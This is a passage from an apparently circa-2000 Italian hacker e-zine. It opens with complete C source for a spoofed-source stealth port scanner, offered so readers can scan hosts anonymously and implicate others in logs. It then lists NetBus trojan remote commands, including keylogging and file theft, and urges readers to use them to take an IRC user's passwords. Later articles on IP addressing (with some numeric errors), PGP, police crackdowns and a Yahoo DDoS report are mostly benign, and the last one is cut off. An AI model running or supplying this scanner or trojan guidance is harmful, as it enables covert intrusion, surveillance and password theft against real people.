
SPOOFING
spoofing ? si grazie :) ok ok, se avete letti gli innumerevoli articoli
apparsi su BFI vi sarete accorti che spoofare delle connessioni tcp e'
praticamente impossibile ora come ora... eppure questo e' il miglior
sistema che esista x potersi occulare, i server su cui si possa fare della
predizione sono pochi, in compenso l'hijacking e' ancora possibile... bhe,
riassumendo:

spoofare in modo cieco e' raramente possibile
spoofare in modo vedente e' possibilissimo, ma dovete avere uno sniffer
sull'host che impersonate(per vedere l'ISN di risposta del server),
l'utilizzo di uno sniffer da remoto presuppone una connessione all'host, e
quindi connettersi e spoofare risulta inutilmente dispendioso rispetto a
connettersi e telnettare :) (a menoche' non manchi proprio "telnet" :)

fusys ha presentato un programma che mandava delle email spoofando il
proprio ip, il fatto e' che il suo mailer mandava dati spoofati solo alla
25 di turno, mentre ho saputo da vecna che e' possibile mandare i dati
anche in altre porte, e lui stesso ha modificato SMailv2.c, solo che non
lo da', dicendo che e' una cazzate farlo :(

in compenso ho qui un altro affarino che risultara' MOLTO interessante :)
... avete prensete quando vi apprestate a scannare un host con nmap
(sperando fortemente che nessuno di voi usi degli scanner che effettuano
full connection) ... se provate a scannare il vostro stesso pc, e fate uno
di un buon logger (come quelli che stanno sul 98% dei server in rete) vi
accorgerete che tutti gli stealth scan vengono irrimediabilmente loggati.
siccome, i log, x definizione :) o si cancellano o si sputtanato, allora
ho avuto la fortuna di trovare vecna che, x spasso credo :) si e' fatto un
"fakescanner" ovvero uno scanner che emula gli stealth scan di nmap
spoofando l'esegutore dello scan. siccome ho visto che ha postato questo
programma in mailing list, non credo ci siano problemi se lo pubblico
anche qui...

<fakescan.c>------------------------------------------------<fakescan.c>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <linux/ip.h>
#include <linux/tcp.h>

void senda_pakki(int,int,int);

struct pkt {
struct iphdr ip;
struct tcphdr tcp;
} pkt;

struct pseudo_header {
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
} pseudo_header;


unsigned int host2ip(char *hostname) {
struct in_addr i;
struct hostent *h;
if((i.s_addr = inet_addr(hostname)) == -1) {
if((h = gethostbyname(hostname)) == NULL) {
fprintf(stderr,"\033[1;34m%s\033[0m :",hostname);
perror("gethostbyname()");
return 0;
}
bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
}
return i.s_addr;
}

int init_tcp(unsigned int dest_addr, unsigned int source_addr,int TYPE) {

int tcp_socket;

/* form ip packet */
pkt.ip.ihl = 5;
pkt.ip.version = 4;
pkt.ip.tos = 0;
pkt.ip.tot_len = htons(40);
pkt.ip.id = getpid()*4;
pkt.ip.frag_off = 0;
pkt.ip.ttl = 255;
pkt.ip.protocol = IPPROTO_TCP;
pkt.ip.check = 0;
if((pkt.ip.saddr = source_addr)==0) return 0;
pkt.ip.daddr = dest_addr;

/* form tcp packet */
pkt.tcp.source = getpid();
pkt.tcp.seq = getpid()*6;
pkt.tcp.ack_seq = 0;
pkt.tcp.res1 = 0;
pkt.tcp.doff = 5;
pkt.tcp.fin = 0;
pkt.tcp.syn = 0;
pkt.tcp.rst = 0;
pkt.tcp.psh = 0;
pkt.tcp.ack = 0;
pkt.tcp.urg = 0;
switch(TYPE) {
case 1: pkt.tcp.syn=1;break; /* SYN scan */
case 2: pkt.tcp.fin=1;break; /* FIN scan */
case 3: pkt.tcp.urg=1;
pkt.tcp.fin=1;
pkt.tcp.psh=1;break; /* XMAS scan */
default:break; /* NULL scan */
}
pkt.tcp.res2 = 0;
pkt.tcp.window = htons(512);
pkt.tcp.check = 0;
pkt.tcp.urg_ptr = 0;

if((tcp_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0) {
perror("socket");
exit(0);
}
return tcp_socket;
}

void senda_pakki(int dest_port,int tcp_socket,int delay) {

struct sockaddr_in sin;
int sinlen;

usleep(delay);

/* setup the sin struct */
sin.sin_family = AF_INET;
sin.sin_port = pkt.tcp.source;
sin.sin_addr.s_addr = pkt.ip.daddr;

/* i pochi campi che cambiano */
pkt.tcp.dest = htons(dest_port);

/* calculate the ip checksum */
pkt.ip.check = in_cksum((unsigned short *)&pkt.ip, 20);

/* set the pseudo header fields */
pseudo_header.source_address = pkt.ip.saddr;
pseudo_header.dest_address = pkt.ip.daddr;
pseudo_header.placeholder = 0;
pseudo_header.protocol = IPPROTO_TCP;
pseudo_header.tcp_length = htons(20);
bcopy((char *)&pkt.tcp, (char *)&pseudo_header.tcp, 20);
pkt.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32);
sinlen = sizeof(sin);
if((sendto(tcp_socket,&pkt,40,0,(struct sockaddr *)&sin,sinlen))==-1) {
perror("sendto");
exit(0);
}
}

main(int argc, char **argv) {
int i,tcp_socket,start_port,end_port,type,delay,init_port,x=1,y=1;
char buf[32],**target=malloc(4096),**source=malloc(4096);
FILE *hostfile,*spoofile;

if(geteuid()!=0) {
printf("\033[1;34m %s needed r00t rulez permission\033[0m.\n",argv[0]);
exit(0);
}

if(argc<7) {
printf(" \033[1;5m Fakescan v1.2 \033[0m");
printf("\n Usage: %s skanned spoofed start_port end_port type delay\n",arg
v[0]);

printf("\n \"spoofed\"&\"skanned\" maybe FILE-HOSTLIST / ONE-HOSTNAME");
printf("\n Type \033[1;32m [1]\033[0mSYN \033[1;32m [2]\033[0mFIN \033
[1;32m [3]\033[0mXMAS \033[1;32m [any]\033[0mNULL\n\n"
);

printf(" Flames [ /etc/lilo.conf ]\n");
printf(" Mail [ vecna@mail.com ]\n");
exit(0);
}

start_port=atoi(argv[3]);
end_port=atoi(argv[4]);
type=atoi(argv[5]);
if((delay=atoi(argv[6]))<0) delay=0;

if((hostfile=fopen(argv[1],"r"))==NULL) {
target[0]=malloc(32);
strcpy(target[0],argv[1]);
}
else {
x = 0;
while (!feof(hostfile)) {
fgets(buf, 32, hostfile);
for (i = 0; i < strlen(buf); i++) if (buf[i] == '\n') buf[i] = '\0';
target[x] = malloc(32);
strcpy(target[x], buf);
x++;
}
target[x-1] = 0x0;
}
fclose(hostfile);

/* stessa routine x i file sorgenti */

if((spoofile=fopen(argv[2],"r"))==NULL) {
source[0]=malloc(32);
strcpy(source[0],argv[2]);
}
else {
y = 0;
while (!feof(spoofile)) {
fgets(buf, 32, spoofile);
for (i = 0; i < strlen(buf); i++) if (buf[i] == '\n') buf[i] = '\0';
source[y] = malloc(32);
strcpy(source[y], buf);
y++;
}
source[y-1] = 0x0;
}
fclose(spoofile);

init_port=start_port;
for(y=0;source[y]!=0x0;y++) {
for(x=0;target[x]!=0x0;x++) {
if((tcp_socket=init_tcp(host2ip(target[x]),host2ip(source[y]),type))==-1) conti
nue;
for(start_port=init_port;start_port<(end_port+1);start_port++) senda_pakki(sta
rt_port,tcp_socket,delay);
printf("\033[1;34m%s \033[0m:spoof scan to %s made.\n",target[x],source[y]);
close(tcp_socket);
}
}
}

in_cksum (addr, len)
u_short *addr;
int len;
{
int nleft = len;
u_short *w = addr;
int sum = 0;
u_short answer = 0;

while (nleft > 1)
{
sum += *w++;
nleft -= 2;
}
if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}

<EOF>--------------------------------------------------------------<EOF>

Ecco, in questo modo non effettuerete connessioni a vostro nome, ma almeno
scannerete con una sufficente anonimita' :) (del resto, in mezzo a quel
casino :)

hostfile e spoofile possono essere 2 file con delle file di host, vanno
messi senza spazi e il "#" davanti non conta come annullatore della riga.


Io penso di aver finito... spero che questo articolo abbia chiarito ad
alcuni come accultarsi un po', anche se ammetto che la mia poca
esperienza, abbia potuto causare la mancanza di esempi pratici in questo
articolo.

rimango comunque speranzosa che venga pubblicato :)

---Azalin---


-=!!!|-Come lavora il sitema IP number-|!!!=-

Autore:
Traduzione di: SONOunuomo

<ndr>

Il testo originale e' allegato nell'e-zine.



Piccolo Dizionario

Ottetto : Insieme di otto bit
Host : computer collegato alla rete

--------------------------->INIZIO<-------------------------------------------

Il Tcp/ip ha un largo numero di reti independenti connesse assieme attraverso
gateways.
Ogni utente dovrebbe essere in grado di accedere ai computers o ad altre
risorse della rete.
Tutto quello che bisogna sapere per ordinare di accedere a un'altro sistema
è un indirzzo IP cioè una serie di 4 serie di cifre come 128.6.4.194.
Il quale è un numero a 32 bit, ma è scritto in serie di 4 cifre decimali
(128.6.4.194), ogni cifra rappresenta 8 bit (oppure ottetto) dell'indirizzo.

La struttura dell'indirizzo da' le informazioni su come accedere ad un sistema
(es. 128.6 è il numero IP assegnato alla Università di Rutgers.)

Il prossimo ottetto (oppure i prossimi 8bit) indica quale Ethernets sono
coinvolti; 128.6.4 e usato dal Computer Science department.

L'ultimo ottetto permette fino a 254 sistemi per ogni Ethernet (254 perchè 0
e 255 non sono permessi). Come menzionato, gli IP Address sono
numeri scritti in serie di 4 ottetti ( in decimale però ) , e.g. 128.6.4.7

Ci sono attualmente tre tipi di indirzzi.
Il problema e che un IP può indicare sia una rete che un Host sulla rete.
Questo perchè i progettisti pensarono che 24 bits erano sufficenti per
rappresentare tutti gli Ip della rete, e che le grandi reti
avrebbero avuto bisogno al massimo di 24 bit per rappresentare tutti i suoi
hosts e invece non fu così.

Queste reti chidevano indirizzi da 48 bit .Ma i progettatori sapevano in
realta' erano sufficenti indirizzo da 32 bit. Così adottarono un Kludge,
pensando che la maggior parte delle reti in futuro sarebbero state
piccole. Così settarono 3 differenti campi (o ranges all'inglese) di
indirizzi.
Gli indirizzi che cominciano con un numero (decimale hehehe) da 1 a 126 usano
solo il primo ottetto per gli IP number delle reti.
Gli altri tre ottetti sono disponibili per gli IP number degli Host .
Così 24 bits sono disponibili per gli hosts. Questi numeri sono usati per le
grandi reti.
Ma ci possono essere solo 126 di queste grandi reti , come Arpanet a grandi
rete commerciali le quali sono poche : Ma non molte oraganizzazioni normali
hanno un indirizzo di "classe A".

Per le normali organizzazioni , sono usati gli indirizzi a "Classe B" .
Gli indirizzi a "classe B" usano i primi 2 ottetti per il numero di rete.
questo numero di rete sono da 128.1 a 191.254 (noi non usiamo lo 0 e il 255
e gli indirizzi che iniziano con il 127 perchè sono usata per scopi
particolari). Gli ultimi due ottetti sono disponibili per gli indirizzi degli
Host, avendo 16 bit per gli indirizzi degli host possiamo avere da 64 a 516
computer,abbastanza per la maggior parte delle organizzazioni.


Gli indirizzi di classe C usano tre ottetti, nei campi (oppure range)da
192.1.1 a 223.254.254. questo
permette di avere solo 254 utenti su ogni rete, ma queste reti possono essere
numerose. Gli indirizzi sopra il 223 sono riservati per i futuri usi
( Classe D e C e altre non ancora definete ). 0 e 255 hanno un scopo
speciale.

Lo 0 e riservato per le macchine che non conoscono il loro indirizzo IP.
E' possibile per una macchina che non conosce il numero della rete sulla
quale si trova, o il loro indirizzo Host. Per esempio, 0.0.0.23 è una macchina
che sa di avere un numero di host 23 ma non conosce su quale rete si trova.

.255 e usato per "Broadcast" , (un messaggio che tu vuoi che ogni sistema
sulla rete veda). Sono usati in situazini dove non si conosce chi parla a chi.

Per esempio tu hai bisogno di fare un look up ad un host name e avere il suo
Indirizzo IP, ma non conosci l'indirizzo del piu vicino server.
Così puoi spedire una richiesta come Broadcast. O se i numerosi sistemi sono
interessati alla stessa informazione, è meno dispendioso spedire un singolo
Broadcast che spedisce i datagrammi individualmente a ogni Host che è
interessato. Per spedire un Broadcast, usi un indirizzo che è creato usando
il tuo numero di rete,
con tutte le stesse parti dell'indirizzo dove il numero dell'host va.
Così se tu sei sulla rete 128.6.4 , e vuoi usare 128.6.4.255 per broadcast.

Non e possibile spedire Broadcasta su Arpanet, o su una linea Point to Point.
Ma è possibile su un Ethernet. Se tu usi un indirizzo Ehthernet con tutti i
suoi bits "su", ogni macchina su ethernet è inteso guardare a quel
datagramma.

Per convenienza, lo standard include anche 255.255.255.255 per essere usato.
Questo si riferisce a tutti gli host sullla rete locale , Alcune vecchie
implementazioni possono usare 0 invece del 255 per formare l'indirizzo
Broadcast.

Tali implementazioni usano 128.6.4.0 invece del 128.6.4.255 come indirizzo
broadcast sulla rete 128.6.4 .Alcune vecchie implementazioni possono non
comprendere la sottorete(subnet). Così considerano il numero di rete 128.6 .
Esse assumeranno un indirizzo Broadcast di 128.6.255.255 o 128.6.0.0 .

Perchè 0 e 255 sono usati per gli indirizzi Sconosciuti oppure gli indirizzi
Broadcast, normalmente gli hosts non dovrebbero contenere lo 0 o il 255.
Inidirizzi non dovrebbero cominciare con 0 , 127 o qualsiasi numero al di
sopra del 223 .

---------------------->FINE<-------------------------------


TABELLA RIASSUNTIVA

=============================================================================
|RANGE IP CLASSE A = DA 1 A 127 --- I rimanenti 3 ottetti sono |
| --- per le subnet |
+---------------------------------------------------------------------------+
|RANGE IP CLASSE B = DA 128.1 A 191.254 --- I rimanenti 2 ottetti sono |
| --- per subnet |
+---------------------------------------------------------------------------+
|RANGE IP CLASSE C = DA 192.1.1 A 223.254.254 -- Il rimanente ottetto è per |
| --- le subnet |
=============================================================================




-[ faQ ]-

<D> Da cosa viene contraddistinta un tipo di subnet da un'altra a basandosi
sull'ottetto e non sulla range ?

<R> Vengono contraddistinte dai bit del primo ottetto che hanno una
combinazione ben definità
quelli di classe A hanno il primo bit sempre fisso 0 quelle di classe B
hanno il primo di 1 e il secondo
a 0 quelle di classe C iniziano con 110 quelle di classe D iniziano con
1110 e quelle di classe E iniziano
con 1111.


---(SONOunuomo)---

-=!!!|-nEtBuS + tElNet-|!!!=-

Autore: |M4X|

Ciao ragazzi sono |M4X|.

Questo è un articolo sul trojan netbus e sulla sua gestione da
remoto! Che vi sembrava un nuovo drink ? Mezzo Netbus e telnet ! Ok basta con
le cazzate e passiamo alle cose serie ... se serie si possono chiamare!

Ecco un semplice caso: siete su irc ed il lamerone di turno ha il netbus
attivo. Dice di essere un grande hacker ... e che lui è uno di quelli che con
un dito ( tasto ) vi butta fuori da qualsiasi canale. Cosa fate?

Aprite netbus e prendete le sue pass? Si dai aprite netbus!

Ma se non avete la gui grafica? Vi fate scappare il lamerone di turno o
aspettate che lo ripescate in chat ? NOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!

Ma a che cazzo vi serve il TELNET! Usatelo almeno una volta in quel cazzo di
winzozze! Bill lo ha messo e noi lo usiamo ... lode allo Z$0B$ll ! Dopo i
dovuti inchini, i ringraziamenti, le lodi ecc...ecc.. e le varie frasi :

"Se non ci fosse bisognerebbe inventarlo"

Prendete un pocket cofeee e magnatevillo tutto! Ehi ma pensavate che stavo
parlando di Bill! Va be che assomiglia ad un pocket cofee ma Bill è
inconfondibile !

Cmq tornando a noi,questi sono i comandi che accetta il nostro troiano da
remoto (utilizzando telnet naturalmente :)

AppRedir;
(path:\filename.exe); App redirection ie. c:\command.com;100

CaptureScreen Cattura schermo

DelFile;(filename.exe) Cancella un file

DisableKeys;1;(keys) Disattiva Key(tastiera)

DisableKeys;0; Resetta Key

DisableKeys;1;abcdefgh
ijklmnopqrstuvwxyzåäö Disattiva tutti keys(tastiera)

DownloadFile;
(path:\filename.exe) Prendi uno specifico file

Eject;1 Apri CD ROM drive

Eject;0 Chiudi CD ROM drive

ExitWin;1 Chiudi/shutdown windows(S.O)

GetApps Vedi Applicazione Corrente

GetACL Vedi admin lista

GetInfo Vedi INFO Window(Finestre)

GetDisks Lista files/dirs/disk

GetSetup Vedi Configurazione Server Parameteri

GetUser Vedi info dell'utente

GetVolume Usa sound volume

KeyClick;1 Key click on

KeyClick;0 Key click off

Listen;1 Start
(keyboard) Ascolta Tastiera

Listen;0 Ferma ascolto tastiera

Message;(message) Invia messaggio-box alla Vittima

NewSetup;serverport;1;
password;youremail;
VICTIMSemail;
smtpserver Invia nuovi parametri admindata (netbus 1.7)

Password;1;ogni
Tasto ServerPwd; Nuova Password

PlaySound;(file.wav) Suona un file.wav

PortRedir;
(listen tcp port);
(ip);
(destination port) Rindirizza una porta specifica

Record;10 Registra un suono per 10 secondi

RemoveServer;1 Rimuovi Server

RemoveServer;0 Cancella Rimozione

ShowImage;(file.exe) Mostra un immagine

SendKeys;(words) Invia un messaggio * a | carattere e un
tasto "return" key

SendKeys;2;13 Invia tasti speciali (esemoio: return,
cursor up/down/left/right)

SetACL;(ip)|
Set (admin) accesso IP`s

SetMousePos;(xpos);
(ypos) Setta posizione Mouse

SwapButton;1 Elimina bottoni mouse

SwapButton;0 Riattiva bottoni mouse

StartApp;(file.exe) Avvia un programma

UploadFile;(file.exe);
(size);
(destination dir) Invia uno specifico file alla vittima

URL;(site) Va ad uno specifico indirizzo web

Consiglio : Non usate mai le gui grafiche ! Usate i comandi "puri". Una gui
grafica puo' essere usata da chiunque ... mentre conoscere tutti
i comandi ed usarli con telnet è cosa da pochi !

Ai newbie : Spero che qualcosa ve la stia insegnando ! Non per forza qualcosa
tecnica,ma anche qualcosa di etica...magari un giorno quando
sarete "hacker" vi ricorderete di quello scassapalle di |M4X| e
dei suoi consigli !

Agli hacker :naturalmente voi non avete letto sto articolo ma un messaggio
anche per voi : aiutate tutte quelle persone che su irc si
spacciano per hacker...non disconnetteteli o bannateli dai canali!
Non serve a niente ... cosi' non impareranno mai!

Spero che abbiate quello che volevo dire,ma credo che non ve le debba
insegnare io queste cose!

---|M4X|---

##########################################
#+--------++--------++--------++--------+#
#| kRipT0 || kRipT0 || kRipT0 || kRipT0 |#
#+--------++--------++--------++--------+#
##########################################


-=!!!|-l'AnG0l0 dEl kRiTt0gRAf0-|!!!=-

Autore; 0-z0nE

Ciao a tutti, sono O-Zone. Mi e' stato chiesto di scrivere un articolo
per AiS sulla crittografia e privacy in rete. Accennero' brevemente
anche sul PGP (Pretty Good Privacy), un programma per proteggere
la nostra corrispondenza e non solo.
Per prima cosa e' necessario cercare di comprendere a cosa serve
proteggere qualcosa per rendero nascosto agli estranei. Supponiamo
di dover dare il nostro indirizzo privato ad un amico che sta' negli
USA, esattamente nell'altra faccia del pianeta: potremmo usare
diversi metodi, primo fra tutti il telefono, oppure la posta normale
o la piu' veloce ed economica E-Mail. Certo, potrebbe sembrare inutile
dannarsi per nascondere il nostro indirizzo: del resto non ho mica
fatto nulla di male ! Il problema non e' dell'indirizzo, o del
numero di telefono o altro: IL PROBLEMA E' CHE LO DECIDO A CHI DIRE
LE MIE COSE e non tollero che altri possano leggano la mia
corrispondenza (o ascoltino le mie conversazioni) senza il mio permesso.
Ecco che entra in ballo la crittografia. Non mi dilunghero' troppo
sulla storia della crittografia o le sue origini o altro.
Semplicemente viviamo in un era in cui la privacy e' fondamentale,
dalle E-Mail tra me e la mia fidanzata lontana alle transazioni
finanziarie degli acquisti in rete. La recente notizia sul fatto
che Echelon sia non una semplice leggenda metropolitana aumenta
la necessita' di proteggersi. Ma come proteggere le nostre E-Mail
che ogni giorno circolano in decine di server alla portata ottica di
qualunque sysadmin un po' piu' smaliziato?
La domanda non e' poi cosi' scontata. Oggi, grazie a Diffie ed Hellman
abbiamo la crittografia a chiave pubblica che ci permette di avere
due chiavi, una pubblica ed una privata. Il concetto base di questo
tipo di crittografia si basa sulle funzioni asimmetriche.
Evitando qualsiasi digressione di matematica, dirro'
semplicemente che non e' (quasi mai) possibile invertire il processo
di queste funzioni. Per eventuale approfondimenti cercare RSA su
qualsiasi motore di ricerca. Per esempio:
Alice ha la sua chiave pubblica (APU) e la sua privata (APR).
Bob ha la sua chiave pubblica (BPU) e la sua privata (BPR).
Elisa vuole scoprire cosa si dicono Alice e Bob nelle loro E-Mail che
puo' intercettare con facilita'.
Alice manda la cua chiave pubblica a Bob e viceversa. Adesso Elisa ha le
chiavi pubbliche sia di Bob che di Alice.
Alice scrive il messaggio per Bob, lo codifica con la sua chiave
pubblica (BPU) e lo invia a Bob. Esso riceve il messaggio e con la
sua chiave privata (BPR) lo decodifica e lo legge. Poi risponde e lo
critta con la chiave pubblica di Alice (APU), poi lo invia ad Alice.
Intando Elisa ha la copia della E-Mail che ALice ha scritto a Bob e
relativa risposta solo che Elisa non puo' sapere cosa c'e' scritto
perche' ha solo le CHIAVI PUBBLICHE con cui puo' solo crittare e non
viceversa. Percui si deduce che l'attacco "Man in the Middle" (Uomo
nel mezzo) non funziona. Il funzionamento base della crittografia
a base pubblica si basa sul fatto che serve la chiave privata per
decodificare un messaggio critatto con la chiave pubblica
complementare. Infatti LA CHIAVE PRIVATA DEVE ESSERE CUSTODITA
GELOSAMENTE ! Una possibile perquisizione che portasse al ritrovamento
della chiave privata di una persona ne comporterebbe l'immediata
violazione di tutte le sue E-Mail (e altri documenti).
Il PGP e' un programma il cui funzionamento e' basato proprio sulla
crittografia a chiave pubblica. Il suo autore Phil Zimmermann ha avuto
moltissime grane con l'NSA per via di questo programma che e' stato
paragonato ad un'arma a tutti gli effetti. In rete sono disponibili
moltissimi particolari sulla vicenda ed il programma e' reperibile
a http://www.pgpi.com gratuitamente. Rammento di scaricare la versione
internazionale, contrassegnata con un 'i' vicino alla versione.
Per esempio il PGP 2.3.6 non e' come PGP 2.3.6i: la prima versione e'
lecita sono in America mentre l'altra nel resto del mondo.
Dopo avervi scaricato il programma, che esiste per Unix-Linux, Mac,
Windows (brrr...) e la versione piu' recente e' la 6.5.2i-beta per
Unix-Linux. Scaricatevelo, installatelo e per prima cosa createvi il
vostro mazzo di chiavi (KeyRing) che include la vostra chiave pubblica
e privata. Estraete (col comando apposito) la chiave pubblica ed
inviatela a tutti i vostri amici. Salvate poi su un floppy tutto il
KeyRing (SECRING.PGP,PUBRING.PGP,etc..) in modo da avere una copia
di backup in caso di formattazione dell'HD. Ricordate che ogni coppia
di chiave privata-pubblica non puo' essere rimpiazzata se ne
distruggete anche una sola. Conservatele con estrema cura.

!!! NON DISTRIBUITE MAI LA VOSTRA CHIAVE PRIVATA !!!

P.S. Dovete scegliere una parola chiave. A tal proposito un paio di
consigli:

1) Non sceglietela troppo corta (almeno 8-9 caratteri)
2) Non sceglietela banale (del tipo "tantovalagattalalardo...")
3) Usate lettere,numeri e punteggiatura.
4) Siccome la passphrase e' KeySensitive usate minuscole E maiuscole
5) Non ditela MAI A NESSUNO IN NESSUN CASO.
6) Sceglietela facile da ricordare perche' e' bene non annotarla.

Ricordate che la segretezza della passphrase e' FONDAMENTALE nel caso
la sicurezza delle vostre chiavi (Pubblica e Privata) sia compromessa.

Eventuali testi per approfondire l'agomento:

-KRIPTONITE edito da Nautilus (Disponibile gratis su Internet a ECN.ORG)

-CODICI E SEGRETI della Rizzoli

Internet:
http://www.rsa.com Sito ufficiale dell'RSA
http://www.ecn.org/kriptonite Kriptonite on Line

Sperando di avervi fatto riflettere e di aver indotto in voi un minimo
di curiosita' sull'argomento, vi saluto.

*--------------------*
|O-Zone |
|zerozone@freemail.it|
|http://zap.to/ozone |
*--------------------*

PGP Key Available

---0 z0nE---


##############################################
#+---------++---------++---------++---------+#
#| st0RiEs || st0RiEs || st0RiEs || st0RiEs |#
#+---------++---------++---------++---------+#
##############################################


-=!!!|-ItAlIaN cRaCkDoWn-|!!!=-


Autore: cYb0rG [Dgt_Brains]

Questo articolo e' stato scritto pensando a tutti i coloro che per una
disinformazione generale sono vittime dei telegiornali, per tutti i coloro
che credono che nella rete si aggiri un fantasma, per tutti i coloro che ne
hanno paura, per tutti i coloro che non sanno, per non dimenticare, per
ringraziare tutti quelli che hanno lottato e/o lottano per una liberta'
digitale:
-!!!-CYBER-RIGHTS-NOW-!!!-
---
Crackdown vuol dire attacco e/o distruzione ma, questo termine, a partire dai
primi anni 90 viene associato a un attacco volto alla repressione della
liberta' delle reti telematiche. Bruce Sterling racconta in 'The hackers
crackdown' (edito dalla SHAKE) la storia del SUNDEVIL (primo crackdown
amerikano - 1990), da allora credo siano avvenuti centinaia di crackdown in
tutto il mondo, + o - tutti sono scoppiati da una scintilla estremamente
piccola.

[d'ora in poi sostituiro' per questione di spazio al termine crackdown, la
parola 'ckd']

In Italia si contano dal 1994 una decina di ckd, ecco uno schema che
raccoglie in ordine cronologico tutti i ckd italiani:

!^^^^^^^^1994^^^^^^^^^^!^^1995^^^!^^^^^^1996^^^^^!^^^^^^^1997^^^^^^!
+----------------------+---------+---------------+--------+--------+
| VIOLAZIONE COPYRIGHT | HACKERS | COMUNICAZIONE | SESSO | MUSICA |
+----------------------+---------+---------------+--------+--------+
>>>>>>hardware1<<<<<<< >ice trap< >>>>>gift sex<<<<

!^^^^^^^^^^^1998^^^^^^^^^^^!^^^^^^^^1999^^^^^^^^^!
+--------------+-----------+---------------------+
| DIFFAMAZIONE | SATANISMO | WORK IN PROGRESS ;( |
+--------------+-----------+---------------------+

Sintetizzero' di seguito i fatti accaduti nei vari ckd:
______
>1994<
^^^^^^
L'operazione HARDWARE1 scatta nel maggio del 1994 e puo' essere definita la
piu' grande azione di polizia informatica di tutti i tempi. A essere colpiti
da questa operazione sono principalmente i nodi Fidonet e tutte le BBS
italiane. Vengono sequestrate decine di computer che contenevano programmi
liberamente distribuibili. Vengono incriminati moltissimi sysop per semplici
sospetti. Molto del materiale sequestrato allora giacera' ancora per molti
anni nei magazzini della GdF senza nemmeno essere esaminato. I reati
contestati ai sysop presi di mira sono: associazione a delinquere per frode
informatica, alterazione di sistemi informatici, detenzione abusiva di codici
di accesso a sistemi telematici, accesso abusivo a sistemi telematci,
illecita duplicazione e contrabbando di software. Le BBS sono state private
dei server necessari alla loro esistenza provocando un blocco durato mesi e
mesi per centinaia di caselle di posta elettronica e per le varie pagine
ospitate dalle BBS. Molti sysop hanno perso il posto di lavoro e venivano
incolpati per reati che sino ad allora non esistevano. Nascono in questo
periodo Strano Network e la mailing list CyberRights. Viene presa di mira
anche Peacelink.
______
>1996<
^^^^^^
Il ckd del 1996 colpisce la libertà di comunicazione delle risorse telematiche
e di internet. La censura colpisce centinai di siti internet definiti
pericolosi, in tutto il mondo. Viene dunque repressa la liberta' di parole,
come viene denunciato in un comunicato internazionale dell'ALCEI
e di altre organizzazioni anti-censura. La censura colpisce sia la pornografia
che il terrorismo.
______
>1997<
^^^^^^
Questo ckd tutti lo ricorderanno perche' e' quello che ha 'colpito' i pedofili
di tutto il mondo.
______
>1998<
^^^^^^
Questo ckd invece ha colpito 'diffamatori' e 'satanisti', viene sequestrato
il server di Isole nella Rete. Cio' ha causato un oscuramento di tutte le
pagine ospitate da www.ecn.org : tutte le associazioni, i centri sociali, le
radio... rimangono prive delle loro pagine web. Viene chiusa la mailing list
CyberRights e tutte le altre liste, vengono chiuse tutte le caselle e-mail
(oltre 300) dei vari centri sociali, radio libere... il tutto per colpa della
denuncia di diffamazione da parte dell'agenzia di viaggi Turban Italia srl
che, si ritiene diffamata da un messaggio di un collettivo di Vicenza apparso
su una mailing list: il messaggio era a favore del popolo kurdo e 'invitava'
a boicottare il turismo in Turchia. Per quanto riguarda il satanismo, un
parroco siciliano denuncia la presenza di materiale oltraggioso presso il
server delle reti civiche romane. Il testo incriminato fa parte di una tesi
di laurea ;). Vengono oscurate le pagine di WWf, LIPU, Croce Rossa, CGIL...
______
>1999<
^^^^^^
lavori in corso

---CyBoRg--- [Dgt_Brains]

-=!!!|-YAHOO rAkK0nTa l'AtTakk0-|!!!=-

Autore: ThE JaCkAl

Entro...

come sicuramente tutti saprete, il mese di Febbraio e' stato
caratterizzato da un notevole polverone seguito agli attacchi DDoS
subiti da numerosi "pezzi grossi" della rete.
Questo articolo e' il mio contributo a capirci qualcosa di piu'.
Consiste nella traduzione del pezzo comparso il 17 Febbraio
su http://packetstorm.securify.com/distributed/yahoo.txt
Dopo una traduzione letterale, ho preferito adattare il testo per
renderlo il piu'fluido e comprensibile possibile...
Buona lettura.

The Jackal

<Il testo originale e' allegato all'e-zine>

...Esco



Ehi la',

seguono alcuni dettagli dei problemi che, nei giorni passati, abbiamo
potuto constatare sui nostri server.

Scusate se forniamo queste informazioni soltanto adesso, ma dovevamo
essere sicuri di essere ben protetti prima di farlo...

Nell'ultima settimana abbiamo potuto constatare almeno quattro tipi di
attacchi differenti al nostro "globalcenter hosted network". Attualmente
abbiamo a disposizione pochi dati sugli ultimi attacchi... ad ogni modo,
sembrano essere tutti molto simili tra loro.
Tutti quanti sembrano essere stati effettuati attraverso un largo e
distribuito utilizzo delle tecniche di smurfing. Abbiamo rilevato,
infatti, soltanto attacchi basati sull'ICMP smurf, dato che, allo stato
delle cose, i primi attacchi hanno lasciato pochissimi dati a nostra
disposizione per l'analisi.

Le voci provenienti da altri siti coinvolti, poi, sembrano confermare
che molti degli attacchi sono simili a quelli che abbiamo potuto
constatare in prima persona, mentre altri sembrano essere completamente
diversi. (per esempio, abbiamo sentito di SYN-attack provenienti da una
singola o, al massimo, da poche sorgenti). Questo ci fa presumere che ci
sia stata anche l'attivita' di un discreto numero di imitatori.

L'attacco piu' pubblicizzato, che e' stato anche l'unico che ha avuto
un significativo impatto su di noi, e' cominciato lunedi' mattina
intorno alle 10.30...
In un primo momento (sempre tenendo presente una scala temporale
ristretta), non ci siamo resi conto di essere sotto attacco ed, inoltre,
un attacco proveniente dall'esterno non era in cima alla lista dei
nostri problemi. Siamo stati, quindi, colti di sorpresa.

La prima ondata di pacchetti, che soltanto dopo realizzammo essere
superiore ad 1 G bits/sec, ha buttato giu' uno dei nostri routers.
Riavuto il router, abbiamo perso tutti i "routing" fino al nostro
"upstream ISP". Avendo avuto recenti malfunzionamenti con alcuni dei
nostri network, per un ora, siamo stati sviati dal reale problema,
tentando di risolverne altri che ci sembravano essere più probabili.

Alla fine non avevamo piu' traffico in "upstream". Questo ci ha permesso
di effettuare i backup dei dati piu' importanti e di realizzare che
eravamo sotto un attacco di tipo Denial of Service (DoS). E' stato
